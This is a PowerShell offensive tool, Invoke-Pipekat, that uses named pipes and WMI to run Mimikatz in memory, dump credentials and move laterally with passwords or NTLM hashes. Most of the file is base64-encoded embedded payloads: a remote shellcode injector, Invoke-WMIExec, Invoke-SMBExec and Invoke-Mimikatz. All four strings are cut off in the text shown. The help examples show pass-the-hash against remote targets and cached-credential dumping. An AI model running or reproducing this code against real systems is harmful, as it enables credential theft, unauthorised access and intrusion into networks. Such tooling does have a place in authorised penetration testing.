2018-09-03 12:53:34 +00:00
function Invoke-Pipekat {
<#
. SYNOPSIS
The Invoke-Pipekat module uses Named Pipes and WMI to extract credentials using the famous @gentilkiwi tool and Invoke-WMIExec from @kevin_robertson
. DESCRIPTION
When you are running as a low-level user but have obtained highly privileged credntials and you want to extract credentials from memory or use any of the features of the famous tool from @gentilkiwi without touching disk or loading from an external source . This uses named pipes to communicate between process and then uses WMI to elevate up on the localhost using the supplied credentials . Default timeout 30 seconds for the clinet pipe and 600 seconds for the server pipe .
. EXAMPLE
Invoke-Pipekat -Username Admin -Password Password1 -Domain .
. EXAMPLE
Invoke-Pipekat -Target 10.0 . 0 . 100 -Username Admin -Password Password1 -Domain .
. EXAMPLE
Invoke-Pipekat -Username Admin -Password Password1 -Domain . -Command " lsadump::cache " -PSexec $True
. EXAMPLE
Invoke-Pipekat -Username Admin -Hash 4E3254E32556AE56AE -Domain . -Command " lsadump::cache " -PSexec $True
. EXAMPLE
Invoke-Pipekat -Target 10.0 . 0 . 1 -Username Admin -Hash 4E3254E32556AE56AE -Domain . -Shellcode ZnVuY3Rpb24gSW52b2tlL -Timeout 15 -TimeoutServer 900
#>
param ( $Command , $Username , $Password , $Domain , $Hash , $Target , $Shellcode , [ bool ] $PSexec = $False , $Timeout , $TimeoutServer )
if ( ! $TimeoutServer ) { $TimeoutServer = 600 }
if ( ! $TimeoutMS ) { $TimeoutMS = 300000 } else { $TimeoutMS = $Timeout * 1000 }
if ( ! $Username ) { echo " No username supplied.... " ; return }
if ( ! $Domain ) { echo " No domain supplied.... " ; return }
if ( ( ! $Password ) -and ( ! $Hash ) ) { echo " No password/hash supplied.... " ; return }
if ( ( $Password ) -and ( $Hash ) ) { echo " Cannot use both a hash and a password.... " ; return }
add-Type -assembly " System.Core "
$pipeName = Random-Pipe 10
echo " `n [+] Pipe Created for Input: $pipeName "
$pipeNameMimi = Random-Pipe 10
echo " [+] Pipe Created for Output: $pipeNameMimi "
$pipekey = Create-AesKey
echo " [+] Encryption key used to secure the data: $pipekey "
# Author: @mattifestation
$invokeshellcode = " ZnVuY3Rpb24gSW52b2tlLUZzZAp7ClBhcmFtICgKW1VJbnQxNl0KJFByb2Nlc3NJRCwKW1BhcmFtZXRlciggUGFyYW1ldGVyU2V0TmFtZSA9ICdSdW5Mb2NhbCcgKV0KW0J5dGVbXV0KJFNoZWxsY29kZQopCkdldC1Qcm9jZXNzIC1JZCAkUHJvY2Vzc0lEIC1FcnJvckFjdGlvbiBTdG9wIHwgT3V0LU51bGwKZnVuY3Rpb24gTG9jYWw6R2V0LURlbGVnYXRlVHlwZQp7ClBhcmFtCigKW091dHB1dFR5cGUoW1R5cGVdKV0KW1BhcmFtZXRlciggUG9zaXRpb24gPSAwKV0KW1R5cGVbXV0KJFBhcmFtZXRlcnMgPSAoTmV3LU9iamVjdCBUeXBlW10oMCkpLApbUGFyYW1ldGVyKCBQb3NpdGlvbiA9IDEgKV0KW1R5cGVdCiRSZXR1cm5UeXBlID0gW1ZvaWRdCikKCgokYSA9IFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluCiRiID0gTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoJ1JlZmxlY3RlZERlbGVnYXRlJykKJGMgPSAkYS5EZWZpbmVEeW5hbWljQXNzZW1ibHkoJGIsIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikKJGQgPSAkYy5EZWZpbmVEeW5hbWljTW9kdWxlKCdJbk1lbW9yeU1vZHVsZScsICRmYWxzZSkKJGUgPSAkZC5EZWZpbmVUeXBlKCdNeURlbGVnYXRlVHlwZScsICdDbGFzcywgUHVibGljLCBTZWFsZWQsIEFuc2lDbGFzcywgQXV0b0NsYXNzJywgW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pCiRmID0gJGUuRGVmaW5lQ29uc3RydWN0b3IoJ1JUU3BlY2lhbE5hbWUsIEhpZGVCeVNpZywgUHVibGljJywgW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCAkUGFyYW1ldGVycykKJGYuU2V0SW1wbGVtZW50YXRpb25GbGFncygnUnVudGltZSwgTWFuYWdlZCcpCiRnID0gJGUuRGVmaW5lTWV0aG9kKCdJbnZva2UnLCAnUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QsIFZpcnR1YWwnLCAkUmV0dXJuVHlwZSwgJFBhcmFtZXRlcnMpCiRnLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoJ1J1bnRpbWUsIE1hbmFnZWQnKQpXcml0ZS1PdXRwdXQgJGUuQ3JlYXRlVHlwZSgpCn0KZnVuY3Rpb24gTG9jYWw6R2V0LVByb2NBZGRyZXNzCnsKUGFyYW0KKApbT3V0cHV0VHlwZShbSW50UHRyXSldCltQYXJhbWV0ZXIoIFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUgKV0KW1N0cmluZ10KJE1vZHVsZSwKW1BhcmFtZXRlciggUG9zaXRpb24gPSAxLCBNYW5kYXRvcnkgPSAkVHJ1ZSApXQpbU3RyaW5nXQokUHJvY2VkdXJlCikKJGggPSBbQXBwRG9tYWluXTo6Q3VycmVudERvbWFpbi5HZXRBc3NlbWJsaWVzKCkgfApXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoJ1xcJylbLTFdLkVxdWFscygnU3lzdGVtLmRsbCcpIH0KJGkgPSAkaC5HZXRUeXBlKCdNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcycpCiRqID0gJGkuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKQokayA9ICRpLkdldE1ldGhvZCgnR2V0UHJvY0FkZHJlc3MnKQokbCA9ICRqLkludm9rZSgkbnVsbCwgQCgkTW9kdWxlKSkKJG0gPSBOZXctT2JqZWN0IEludFB0cgokbiA9IE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigkbSwgJGwpCldyaXRlLU91dHB1dCAkay5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdJG4sICRQcm9jZWR1cmUpKSB9CmZ1bmN0aW9uIExvY2FsOkVtaXQtQ2FsbFRocmVhZFN0dWIgKFtJbnRQdHJdICRzLCBbSW50UHRyXSAkdCwgW0ludF0gJHUpCnsgJG8gPSAkdSAvIDgKZnVuY3Rpb24gTG9jYWw6Q29udmVydFRvLUxpdHRsZUVuZGlhbiAoW0ludFB0cl0gJHEpCnsgJHAgPSBOZXctT2JqZWN0IEJ5dGVbXSgwKQokcS5Ub1N0cmluZygiWCQoJG8qMikiKSAtc3BsaXQgJyhbQS1GMC05XXsyfSknIHwgRm9yRWFjaC1PYmplY3QgeyBpZiAoJF8pIHsgJHAgKz0gW0J5dGVdICgnMHh7MH0nIC1mICRfKSB9IH0KW1N5c3RlbS5BcnJheV06OlJldmVyc2UoJHApCldyaXRlLU91dHB1dCAkcCB9CiRyID0gTmV3LU9iamVjdCBCeXRlW10oMCkKaWYgKCRvIC1lcSA4KQp7IFtCeXRlW11dICRyID0gMHg0OCwweEI4CiRyICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJHMKJHIgKz0gMHhGRiwweEQwCiRyICs9IDB4NkEsMHgwMAokciArPSAweDQ4LDB4QjgKJHIgKz0gQ29udmVydFRvLUxpdHRsZUVuZGlhbiAkdAokciArPSAweEZGLDB4RDAKfSBlbHNlIHsgW0J5dGVbXV0gJHIgPSAweEI4CiRyICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJHMKJHIgKz0gMHhGRiwweEQwCiRyICs9IDB4NkEsMHgwMAokciArPSAweEI4CiRyICs9IENvbnZlcnRUby1MaXR0bGVFbmRpYW4gJHQKJHIgKz0gMHhGRiwweEQwCn0gV3JpdGUtT3V0cHV0ICRyIH0KZnVuY3Rpb24gTG9jYWw6SW5qZWN0LVJlbW90ZVNoZWxsY29kZSAoW0ludF0gJFByb2Nlc3NJRCkgewokYXAgPSAkT3BlblByb2Nlc3MuSW52b2tlKDB4MDAxRjBGRkYsICRmYWxzZSwgJFByb2Nlc3NJRCkKaWYgKCEkYXApe1Rocm93ICJVIn0KJFJlbW90ZU1lbUFkZHIgPSAkVmlydHVhbEFsbG9jRXguSW52b2tlKCRhcCwgW0ludFB0cl06Olplcm8sICRTaGVsbGNvZGUuTGVuZ3RoICsgMSwgMHgzMDAwLCAweDQwKQppZiAoISRSZW1vdGVNZW1BZGRyKXtUaHJvdyAiVW5iIn0KJGFvLkludm9rZSgkYXAsICRSZW1vdGVNZW1BZGRyLCAkU2hlbGxjb2RlLCAkU2hlbGxjb2RlLkxlbmd0aCwgW1JlZl0gMCkgfCBPdXQtTnVsbAokdCA9IEdldC1Qcm9jQWRkcmVzcyBrZXJuZWwzMi5kbGwgRXhpdFRocmVhZAokciA9IEVtaXQtQ2FsbFRocmVhZFN0dWIgJFJlbW90ZU1lbUFkZHIgJHQgMzIKJFJlbW90ZVN0dWJBZGRyID0gJFZpcnR1YWxBbGxvY0V4Lkludm9rZSgkYXAsIFtJbnRQdHJdOjpaZXJvLCAkci5MZW5ndGgsIDB4MzAwMCwgMHg0MCkKaWYgKCEkUmVtb3RlU3R1YkFkZHIpe1Rocm93ICJVbmFEIn0KJGFvLkludm9rZSgkYXAsICRSZW1vdGVTdHViQWRkciwgJHIsICRyLkxlbmd0aCwgW1J
# Author: @kevin_robertson
$wmiexec = " ZnVuY3Rpb24gSW52b2tlLVdNSUV4ZWMNCnsNCjwjDQouU1lOT1BTSVMNCkludm9rZS1XTUlFeGVjIHBlcmZvcm1zIFdNSSBjb21tYW5kIGV4ZWN1dGlvbiBvbiB0YXJnZXRzIHVzaW5nIE5UTE12MiBwYXNzIHRoZSBoYXNoIGF1dGhlbnRpY2F0aW9uLg0KDQouUEFSQU1FVEVSIFRhcmdldA0KSG9zdG5hbWUgb3IgSVAgYWRkcmVzcyBvZiB0YXJnZXQuDQoNCi5QQVJBTUVURVIgVXNlcm5hbWUNClVzZXJuYW1lIHRvIHVzZSBmb3IgYXV0aGVudGljYXRpb24uDQoNCi5QQVJBTUVURVIgRG9tYWluDQpEb21haW4gdG8gdXNlIGZvciBhdXRoZW50aWNhdGlvbi4gVGhpcyBwYXJhbWV0ZXIgaXMgbm90IG5lZWRlZCB3aXRoIGxvY2FsIGFjY291bnRzIG9yIHdoZW4gdXNpbmcgQGRvbWFpbiBhZnRlcg0KdGhlIHVzZXJuYW1lLiANCg0KLlBBUkFNRVRFUiBIYXNoDQpOVExNIHBhc3N3b3JkIGhhc2ggZm9yIGF1dGhlbnRpY2F0aW9uLiBUaGlzIG1vZHVsZSB3aWxsIGFjY2VwdCBlaXRoZXIgTE06TlRMTSBvciBOVExNIGZvcm1hdC4NCg0KLlBBUkFNRVRFUiBDb21tYW5kDQpDb21tYW5kIHRvIGV4ZWN1dGUgb24gdGhlIHRhcmdldC4gSWYgYSBjb21tYW5kIGlzIG5vdCBzcGVjaWZpZWQsIHRoZSBmdW5jdGlvbiB3aWxsIGp1c3QgY2hlY2sgdG8gc2VlIGlmIHRoZQ0KdXNlcm5hbWUgYW5kIGhhc2ggaGFzIGFjY2VzcyB0byBXTUkgb24gdGhlIHRhcmdldC4NCg0KLlBBUkFNRVRFUiBTbGVlcA0KRGVmYXVsdCA9IDEwIE1pbGxpc2Vjb25kczogU2V0cyB0aGUgZnVuY3Rpb24ncyBTdGFydC1TbGVlcCB2YWx1ZXMgaW4gbWlsbGlzZWNvbmRzLiBZb3UgY2FuIHRyeSB0d2Vha2luZyB0aGlzDQpzZXR0aW5nIGlmIHlvdSBhcmUgZXhwZXJpZW5jaW5nIHN0cmFuZ2UgcmVzdWx0cy4NCg0KLkVYQU1QTEUNCkludm9rZS1XTUlFeGVjIC1UYXJnZXQgMTkyLjE2OC4xMDAuMjAgLURvbWFpbiBURVNURE9NQUlOIC1Vc2VybmFtZSBURVNUIC1IYXNoIEY2RjM4Qjc5M0RCNkE5NEJBMDRBNTJGMUQzRUU5MkYwIC1Db21tYW5kICJjb21tYW5kIG9yIGxhdW5jaGVyIHRvIGV4ZWN1dGUiIC12ZXJib3NlDQoNCi5FWEFNUExFDQpJbnZva2UtV01JRXhlYyAtVGFyZ2V0IDE5Mi4xNjguMTAwLjIwIC1Vc2VybmFtZSBhZG1pbmlzdHJhdG9yIC1IYXNoIEY2RjM4Qjc5M0RCNkE5NEJBMDRBNTJGMUQzRUU5MkYwIC1Db21tYW5kICJjbWQuZXhlIC9jIG5ldCB1c2VyIFdNSUV4ZWMgV2ludGVyMjAxNyAvYWRkIg0KDQouRVhBTVBMRQ0KSW52b2tlLVdNSUV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtVXNlcm5hbWUgYWRtaW5pc3RyYXRvciAtUGFzc3dvcmQgVGVzdA0KDQouTElOSw0KaHR0cHM6Ly9naXRodWIuY29tL0tldmluLVJvYmVydHNvbi9JbnZva2UtVGhlSGFzaA0KDQojPg0KW0NtZGxldEJpbmRpbmcoKV0NCnBhcmFtDQooDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JHRydWUpXVtTdHJpbmddJFRhcmdldCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kdHJ1ZSldW1N0cmluZ10kVXNlcm5hbWUsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSREb21haW4sDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSRDb21tYW5kLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kUGFzc3dvcmQsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bVmFsaWRhdGVTY3JpcHQoeyRfLkxlbmd0aCAtZXEgMzIgLW9yICRfLkxlbmd0aCAtZXEgNjV9KV1bU3RyaW5nXSRIYXNoLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW0ludF0kU2xlZXA9MTAsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSROYW1lDQopDQoNCmlmKCRDb21tYW5kKQ0Kew0KICAgICRXTUlfZXhlY3V0ZSA9ICR0cnVlDQp9DQoNCmlmKCEkUGFzc3dvcmQgLWFuZCAhJEhhc2gpew0KICAgIGV4aXQNCn0NCg0KaWYoJFBhc3N3b3JkKXsNCiAgICAkSGFzaCA9IEdldC1NRDRIYXNoIC1EYXRhVG9IYXNoICQoW1RleHQuRW5jb2RpbmddOjpVbmljb2RlLkdldEJ5dGVzKCRQYXNzd29yZCkpDQogICAgV3JpdGUtT3V0cHV0ICJIYXNoIGJlaW5nIHVzZWQ6ICRIYXNoIg0KfQ0KDQpmdW5jdGlvbiBDb252ZXJ0RnJvbS1QYWNrZXRPcmRlcmVkRGljdGlvbmFyeQ0Kew0KICAgIHBhcmFtKCRwYWNrZXRfb3JkZXJlZF9kaWN0aW9uYXJ5KQ0KDQogICAgRm9yRWFjaCgkZmllbGQgaW4gJHBhY2tldF9vcmRlcmVkX2RpY3Rpb25hcnkuVmFsdWVzKQ0KICAgIHsNCiAgICAgICAgJGJ5dGVfYXJyYXkgKz0gJGZpZWxkDQogICAgfQ0KDQogICAgcmV0dXJuICRieXRlX2FycmF5DQp9DQoNCiNSUEMNCg0KZnVuY3Rpb24gR2V0LVBhY2tldFJQQ0JpbmQoKQ0Kew0KICAgIHBhcmFtKFtJbnRdJHBhY2tldF9jYWxsX0lELFtCeXRlW11dJHBhY2tldF9tYXhfZnJhZyxbQnl0ZVtdXSRwYWNrZXRfbnVtX2N0eF9pdGVtcyxbQnl0ZVtdXSRwYWNrZXRfY29udGV4dF9JRCxbQnl0ZVtdXSRwYWNrZXRfVVVJRCxbQnl0ZVtdXSRwYWNrZXRfVVVJRF92ZXJzaW9uKQ0KDQogICAgW0J5dGVbXV0kcGFja2V0X2NhbGxfSURfYnl0ZXMgPSBbU3lzdGVtLkJpdENvbnZlcnRlcl06OkdldEJ5dGVzKCRwYWNrZXRfY2FsbF9JRCkNCg0KICAgICRwYWNrZXRfUlBDQmluZCA9IE5ldy1PYmplY3QgU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkLk9yZGVyZWREaWN0aW9uYXJ5DQogICAgJHBhY2tldF9SUENCaW5kLkFkZCgiUlBDQmluZF9WZXJzaW9uIixbQnl0ZVtdXSgweDA1KSkNCiAgICAkcGFja2V0X1JQQ0JpbmQuQWRkKCJSUENCaW5kX1ZlcnNpb25NaW5vciIsW0J5dGVbXV0oMHgwMCkpDQogICAgJHBhY2tldF9SUENCaW5kLkFkZCgiUlBDQmluZF9QYWNrZXRUeXBlIixbQnl0ZVtdXSgweDBiKSkNCiAgICAkcGFja2V0X1JQQ0JpbmQuQWRkKCJSUENCaW5kX1BhY2tldEZsYWdzIixbQnl0ZVtdXSgweDAzKSkNCiAgICAkcGFja2V0X1JQQ0JpbmQuQWRkKCJSUENCaW5kX0RhdGFSZXByZXNlbnRhdGlvbiIsW0J5dGVbXV0oMHgxMCwweDAwLDB4MDAsMHgwMCkpDQogICA
# Author: @kevin_robertson
$smbexec = " ZnVuY3Rpb24gSW52b2tlLVNNQkV4ZWMNCnsNCjwjDQouU1lOT1BTSVMNCkludm9rZS1TTUJFeGVjIHBlcmZvcm1zIFNNQkV4ZWMgc3R5bGUgY29tbWFuZCBleGVjdXRpb24gd2l0aCBOVExNdjIgcGFzcyB0aGUgaGFzaCBhdXRoZW50aWNhdGlvbi4gSW52b2tlLVNNQkV4ZWMNCnN1cHBvcnRzIFNNQjEgYW5kIFNNQjIgd2l0aCBhbmQgd2l0aG91dCBTTUIgc2lnbmluZy4NCg0KLlBBUkFNRVRFUiBUYXJnZXQNCkhvc3RuYW1lIG9yIElQIGFkZHJlc3Mgb2YgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIFVzZXJuYW1lDQpVc2VybmFtZSB0byB1c2UgZm9yIGF1dGhlbnRpY2F0aW9uLg0KDQouUEFSQU1FVEVSIERvbWFpbg0KRG9tYWluIHRvIHVzZSBmb3IgYXV0aGVudGljYXRpb24uIFRoaXMgcGFyYW1ldGVyIGlzIG5vdCBuZWVkZWQgd2l0aCBsb2NhbCBhY2NvdW50cyBvciB3aGVuIHVzaW5nIEBkb21haW4gYWZ0ZXIgdGhlDQp1c2VybmFtZS4gDQoNCi5QQVJBTUVURVIgSGFzaA0KTlRMTSBwYXNzd29yZCBoYXNoIGZvciBhdXRoZW50aWNhdGlvbi4gVGhpcyBtb2R1bGUgd2lsbCBhY2NlcHQgZWl0aGVyIExNOk5UTE0gb3IgTlRMTSBmb3JtYXQuDQoNCi5QQVJBTUVURVIgQ29tbWFuZA0KQ29tbWFuZCB0byBleGVjdXRlIG9uIHRoZSB0YXJnZXQuIElmIGEgY29tbWFuZCBpcyBub3Qgc3BlY2lmaWVkLCB0aGUgZnVuY3Rpb24gd2lsbCBjaGVjayB0byBzZWUgaWYgdGhlIHVzZXJuYW1lDQphbmQgaGFzaCBwcm92aWRlcyBsb2NhbCBhZG1pbmlzdHJhdG9yIGFjY2VzcyBvbiB0aGUgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIENvbW1hbmRDT01TUEVDDQpEZWZhdWx0ID0gRW5hYmxlZDogUHJlcGVuZCAlQ09NU1BFQyUgL0MgdG8gQ29tbWFuZC4NCg0KLlBBUkFNRVRFUiBTZXJ2aWNlDQpEZWZhdWx0ID0gMjAgQ2hhcmFjdGVyIFJhbmRvbTogTmFtZSBvZiB0aGUgc2VydmljZSB0byBjcmVhdGUgYW5kIGRlbGV0ZSBvbiB0aGUgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIFNNQjENCihTd2l0Y2gpIEZvcmNlIFNNQjEuIFRoZSBkZWZhdWx0IGJlaGF2aW9yIGlzIHRvIHBlcmZvcm0gU01CIHZlcnNpb24gbmVnb3RpYXRpb24gYW5kIHVzZSBTTUIyIGlmIHN1cHBvcnRlZCBieSB0aGUNCnRhcmdldC4NCg0KLlBBUkFNRVRFUiBTbGVlcA0KRGVmYXVsdCA9IDE1MCBNaWxsaXNlY29uZHM6IFNldHMgdGhlIGZ1bmN0aW9uJ3MgU3RhcnQtU2xlZXAgdmFsdWVzIGluIG1pbGxpc2Vjb25kcy4gWW91IGNhbiB0cnkgdHdlYWtpbmcgdGhpcw0Kc2V0dGluZyBpZiB5b3UgYXJlIGV4cGVyaWVuY2luZyBzdHJhbmdlIHJlc3VsdHMuDQoNCi5FWEFNUExFDQpJbnZva2UtU01CRXhlYyAtVGFyZ2V0IDE5Mi4xNjguMTAwLjIwIC1Eb21haW4gVEVTVERPTUFJTiAtVXNlcm5hbWUgVEVTVCAtSGFzaCBGNkYzOEI3OTNEQjZBOTRCQTA0QTUyRjFEM0VFOTJGMCAtQ29tbWFuZCAiY29tbWFuZCBvciBsYXVuY2hlciB0byBleGVjdXRlIiAtdmVyYm9zZQ0KDQouRVhBTVBMRQ0KSW52b2tlLVNNQkV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtRG9tYWluIFRFU1RET01BSU4gLVVzZXJuYW1lIFRFU1QgLUhhc2ggRjZGMzhCNzkzREI2QTk0QkEwNEE1MkYxRDNFRTkyRjAgLUNvbW1hbmQgIm5ldCB1c2VyIFNNQkV4ZWMgV2ludGVyMjAxNyAvYWRkIg0KDQouRVhBTVBMRQ0KSW52b2tlLVNNQkV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtRG9tYWluIFRFU1RET01BSU4gLVVzZXJuYW1lIFRFU1QgLUhhc2ggRjZGMzhCNzkzREI2QTk0QkEwNEE1MkYxRDNFRTkyRjANCg0KLkxJTksNCmh0dHBzOi8vZ2l0aHViLmNvbS9LZXZpbi1Sb2JlcnRzb24vSW52b2tlLVRoZUhhc2gNCg0KIz4NCltDbWRsZXRCaW5kaW5nKCldDQpwYXJhbQ0KKA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSR0cnVlKV1bU3RyaW5nXSRUYXJnZXQsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JHRydWUpXVtTdHJpbmddJFVzZXJuYW1lLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kRG9tYWluLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kQ29tbWFuZCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtWYWxpZGF0ZVNldCgiWSIsIk4iKV1bU3RyaW5nXSRDb21tYW5kQ09NU1BFQz0iWSIsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bVmFsaWRhdGVTY3JpcHQoeyRfLkxlbmd0aCAtZXEgMzIgLW9yICRfLkxlbmd0aCAtZXEgNjV9KV1bU3RyaW5nXSRIYXNoLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kU2VydmljZSwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtTd2l0Y2hdJFNNQjEsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSRQYXNzd29yZCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtJbnRdJFNsZWVwPTE1MA0KKQ0KDQppZighJFBhc3N3b3JkIC1hbmQgISRIYXNoKXsNCiAgICBleGl0DQp9DQoNCmlmKCRQYXNzd29yZCl7DQogICAgJEhhc2ggPSBHZXQtTUQ0SGFzaCAtRGF0YVRvSGFzaCAkKFtUZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkUGFzc3dvcmQpKQ0KICAgIFdyaXRlLU91dHB1dCAiSGFzaCBiZWluZyB1c2VkOiAkSGFzaCINCn0NCg0KaWYoJENvbW1hbmQpDQp7DQogICAgJFNNQl9leGVjdXRlID0gJHRydWUNCn0NCg0KaWYoJFNNQjEpDQp7DQogICAgJFNNQl92ZXJzaW9uID0gJ1NNQjEnDQp9DQoNCmZ1bmN0aW9uIENvbnZlcnRGcm9tLVBhY2tldE9yZGVyZWREaWN0aW9uYXJ5DQp7DQogICAgcGFyYW0oJHBhY2tldF9vcmRlcmVkX2RpY3Rpb25hcnkpDQoNCiAgICBGb3JFYWNoKCRmaWVsZCBpbiAkcGFja2V0X29yZGVyZWRfZGljdGlvbmFyeS5WYWx1ZXMpDQogICAgew0KICAgICAgICAkYnl0ZV9hcnJheSArPSAkZmllbGQNCiAgICB9DQoNCiAgICByZXR1cm4gJGJ5dGVfYXJyYXkNCn0NCg0KI05ldEJJT1MNCg0KZnVuY3Rpb24gR2V0LVBhY2tldE5ldEJJT1NTZXNzaW9uU2VydmljZSgpDQp7DQogICAgcGFyYW0oW0ludF0kcGFja2V0X2h
# Author: @JosephBialek & @gentilkiwi
$mk = " ZnVuY3Rpb24gSW52b2tlLU1LDQp7DQoNCltDbWRsZXRCaW5kaW5nKERlZmF1bHRQYXJhbWV0ZXJTZXROYW1lPSJEdW1wQ3JlZHMiKV0NClBhcmFtKA0KCVtQYXJhbWV0ZXIoUG9zaXRpb24gPSAwKV0NCglbU3RyaW5nW11dDQoJJENvbXB1dGVyTmFtZSwNCg0KICAgIFtQYXJhbWV0ZXIoUGFyYW1ldGVyU2V0TmFtZSA9ICJEdW1wQ3JlZHMiLCBQb3NpdGlvbiA9IDEpXQ0KICAgIFtTd2l0Y2hdDQogICAgJER1bXBDcmVkcywNCg0KICAgIFtQYXJhbWV0ZXIoUGFyYW1ldGVyU2V0TmFtZSA9ICJEdW1wQ2VydHMiLCBQb3NpdGlvbiA9IDEpXQ0KICAgIFtTd2l0Y2hdDQogICAgJER1bXBDZXJ0cywNCg0KICAgIFtQYXJhbWV0ZXIoUGFyYW1ldGVyU2V0TmFtZSA9ICJDdXN0b21Db21tYW5kIiwgUG9zaXRpb24gPSAxKV0NCiAgICBbU3RyaW5nXQ0KICAgICRDb21tYW5kDQopDQoNClNldC1TdHJpY3RNb2RlIC1WZXJzaW9uIDINCg0KDQokUmVtb3RlU2NyaXB0QmxvY2sgPSB7DQoJW0NtZGxldEJpbmRpbmcoKV0NCglQYXJhbSgNCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICR0cnVlKV0NCgkJW1N0cmluZ10NCgkJJFBFQnl0ZXM2NCwNCg0KICAgICAgICBbUGFyYW1ldGVyKFBvc2l0aW9uID0gMSwgTWFuZGF0b3J5ID0gJHRydWUpXQ0KCQlbU3RyaW5nXQ0KCQkkUEVCeXRlczMyLA0KCQkNCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDIsIE1hbmRhdG9yeSA9ICRmYWxzZSldDQoJCVtTdHJpbmddDQoJCSRGdW5jUmV0dXJuVHlwZSwNCgkJCQkNCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDMsIE1hbmRhdG9yeSA9ICRmYWxzZSldDQoJCVtJbnQzMl0NCgkJJFByb2NJZCwNCgkJDQoJCVtQYXJhbWV0ZXIoUG9zaXRpb24gPSA0LCBNYW5kYXRvcnkgPSAkZmFsc2UpXQ0KCQlbU3RyaW5nXQ0KCQkkUHJvY05hbWUsDQoNCiAgICAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDUsIE1hbmRhdG9yeSA9ICRmYWxzZSldDQogICAgICAgIFtTdHJpbmddDQogICAgICAgICRFeGVBcmdzDQoJKQ0KCQ0KCSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQoJIyMjIyMjIyMjIyAgV2luMzIgU3R1ZmYgICMjIyMjIyMjIyMNCgkjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KCUZ1bmN0aW9uIEdldC1XaW4zMlR5cGVzDQoJew0KCQkkV2luMzJUeXBlcyA9IE5ldy1PYmplY3QgU3lzdGVtLk9iamVjdA0KDQoJCSNEZWZpbmUgYWxsIHRoZSBzdHJ1Y3R1cmVzL2VudW1zIHRoYXQgd2lsbCBiZSB1c2VkDQoJCSMJVGhpcyBhcnRpY2xlIHNob3dzIHlvdSBob3cgdG8gZG8gdGhpcyB3aXRoIHJlZmxlY3Rpb246IGh0dHA6Ly93d3cuZXhwbG9pdC1tb25kYXkuY29tLzIwMTIvMDcvc3RydWN0cy1hbmQtZW51bXMtdXNpbmctcmVmbGVjdGlvbi5odG1sDQoJCSREb21haW4gPSBbQXBwRG9tYWluXTo6Q3VycmVudERvbWFpbg0KCQkkRHluYW1pY0Fzc2VtYmx5ID0gTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoJ0R5bmFtaWNBc3NlbWJseScpDQoJCSRBc3NlbWJseUJ1aWxkZXIgPSAkRG9tYWluLkRlZmluZUR5bmFtaWNBc3NlbWJseSgkRHluYW1pY0Fzc2VtYmx5LCBbU3lzdGVtLlJlZmxlY3Rpb24uRW1pdC5Bc3NlbWJseU